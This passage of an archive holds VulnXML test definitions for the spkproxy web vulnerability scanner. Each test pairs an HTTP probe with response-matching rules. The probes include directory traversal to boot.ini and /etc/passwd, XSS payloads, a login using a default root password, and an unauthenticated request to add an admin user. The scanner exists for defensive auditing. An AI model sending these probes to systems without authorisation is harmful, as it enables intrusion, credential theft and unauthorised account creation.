should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/jsp/pageImport2.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Internal Servlet 200 Internal Servlet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-110.xml0100664000076500007650000000722607566204543017555 0ustar davedave (pageInfo.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/jsp/pageInfo.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Internal Servlet 200 Internal Servlet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-111.xml0100664000076500007650000000723407566204543017555 0ustar davedave (pageInvalid.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/jsp/pageInvalid.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Internal Servlet 200 Internal Servlet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-112.xml0100664000076500007650000000724407566204543017557 0ustar davedave (pageIsErrorPage.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/jsp/pageIsErrorPage.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Internal Servlet 200 Internal Servlet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-113.xml0100664000076500007650000000724607566204543017562 0ustar davedave (pageIsThreadSafe.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/jsp/pageIsThreadSafe.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Internal Servlet 200 Internal Servlet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-114.xml0100664000076500007650000000723407566204543017560 0ustar davedave (pageSession.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/jsp/pageSession.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Internal Servlet 200 Internal Servlet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-115.xml0100664000076500007650000000726007566204543017560 0ustar davedave (IntegerOverflow.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/jsp/declaration/IntegerOverflow.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Internal Servlet 200 Internal Servlet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-116.xml0100664000076500007650000000707407566204543017564 0ustar davedave (index.html) "Default Apache Tomcat documentation found." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /tomcat-docs/index.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-117.xml0100664000076500007650000000723007566204543017557 0ustar davedave (etc/passwd) "Apache is misconfigured to view files by accessing ~nobody/filename. Change UserDir from './' to something else in httpd.conf." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /~nobody/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-11.xml0100664000076500007650000001010207566204543017460 0ustar davedave (////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////) "Abyss 1.03 reveals directory listing when 256 /'s are requested." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ index of 200 index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-120.xml0100664000076500007650000000704207566204543017552 0ustar davedave (.wwwacl) "Contains authorization information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.wwwacl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-121.xml0100664000076500007650000000704407566204543017555 0ustar davedave (.www_acl) "Contains authorization information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.www_acl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-125.xml0100664000076500007650000000714307566204543017561 0ustar davedave (applist.asp) "Citrix server may allow remote users to view applications installed without authenticating." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /applist.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-126.xml0100664000076500007650000000737007566204543017564 0ustar davedave (boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/) "Citrix CGI allows directory traversal." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-127.xml0100664000076500007650000000717607566204543017571 0ustar davedave (127.0.0.1:2301/ HTTP/1.0) "The Compaq WBEM interface can act as an HTTP proxy 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET "http://"127.0.0.1:2301/ HTTP/1.0 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Compaq WBEM Device 200 Compaq WBEM Device 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-128.xml0100664000076500007650000000707707566204543017572 0ustar davedave (Survey.Htm) "This Compaq device 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Survey/Survey.Htm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ System Components 200 System Components 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1295.xml0100664000076500007650000000727207566204543017655 0ustar davedave (..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini) "GoAhead Web Server 2.1 is vulnerable to arbitrary file retrieval 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1296.xml0100664000076500007650000000740507566204543017654 0ustar davedave (<script>alert('Vulnerable')</script>) "GoAhead Web Server 2.1 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1297.xml0100664000076500007650000000726607566204543017662 0ustar davedave (goform/CheckLogin?login=root&password=tslinux) "The Cyclades' web user 'root' still has the default password 'tslinux' set 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /goform/CheckLogin?login=root&password=tslinux HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ MainPageTable 200 MainPageTable 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1298.xml0100664000076500007650000000720007566204543017647 0ustar davedave (file/../../../../../../../../etc/) "The Icecast server allows the file system to be probed for directory structure 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /file/../../../../../../../../etc/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1299.xml0100664000076500007650000000741507566204543017660 0ustar davedave (<script>alert('Vulnerable')</script>.shtm) "Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /<script>alert('Vulnerable')</script>.shtm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script>\.shtml 200 <script>alert\('Vulnerable'\)</script>\.shtml 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-129.xml0100664000076500007650000000713307566204543017564 0ustar davedave (CQMGSERV/CF-SINFO.TPF) "This Compaq device 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /WEBAGENT/CQMGSERV/CF-SINFO.TPF HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ General Information 200 General Information 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1300.xml0100664000076500007650000000741307566204543017635 0ustar davedave (<script>alert('Vulnerable')</script>.stm) "Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /<script>alert('Vulnerable')</script>.stm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script>\.shtml 200 <script>alert\('Vulnerable'\)</script>\.shtml 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1301.xml0100664000076500007650000000707107566204543017636 0ustar davedave (readme.eml) "Remote server may be infected with the Nimda virus." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /readme.eml HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1302.xml0100664000076500007650000000716607566204543017644 0ustar davedave (................../config.sys) "PWS allows files to be read by prepending multiple '.' characters. At worst 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /................../config.sys HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1303.xml0100664000076500007650000000722007566204543017634 0ustar davedave (../../../../../../../../../boot.ini) "The remote server allows any system file to be retrieved remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /../../../../../../../../../boot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1304.xml0100664000076500007650000000724007566204543017637 0ustar davedave (..\\..\\..\\..\\..\\..\\..\\boot.ini) "It is possible to read files on the server by adding /../ in front of file name." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /..\\..\\..\\..\\..\\..\\..\\boot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1305.xml0100664000076500007650000000737707566204543017653 0ustar davedave (?\"><script>alert('Vulnerable');</script>) "IIS is vulnerable to Cross Site Scriptin (XSS). Apply MS02-018." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /?\"><script>alert('Vulnerable');</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-1306.xml0100664000076500007650000000710007566204543017634 0ustar davedave (adsamples/config/site.csc) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /adsamples/config/site.csc HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1307.xml0100664000076500007650000000711707566204543017645 0ustar davedave (advworks/equipment/catalog_type.asp) "Just found this file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /advworks/equipment/catalog_type.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1308.xml0100664000076500007650000000721007566204543017640 0ustar davedave (blahb.ida) "Reveals physical path. Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /blahb.ida HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1309.xml0100664000076500007650000000721007566204543017641 0ustar davedave (blahb.idq) "Reveals physical path. Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /blahb.idq HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-130.xml0100664000076500007650000000735607566204543017563 0ustar davedave (@AdminAddadmin?uid=foo&password=bar&re_password=bar) "Sun Answerbook may allow users to be created without proper authentication first. Attempted to add user 'foo' with password 'bar'." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1310.xml0100664000076500007650000000704007566204543017632 0ustar davedave (carbo.dll) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /carbo.dll HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1311.xml0100664000076500007650000000705707566204543017643 0ustar davedave (global.asa) "The global.asa file was retrieved 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /global.asa HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ RUNAT 200 RUNAT 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1312.xml0100664000076500007650000000712007566204543017633 0ustar davedave (iisadmin/) "Access to /iisadmin should be restricted to localhost or allowed hosts only." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iisadmin/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the 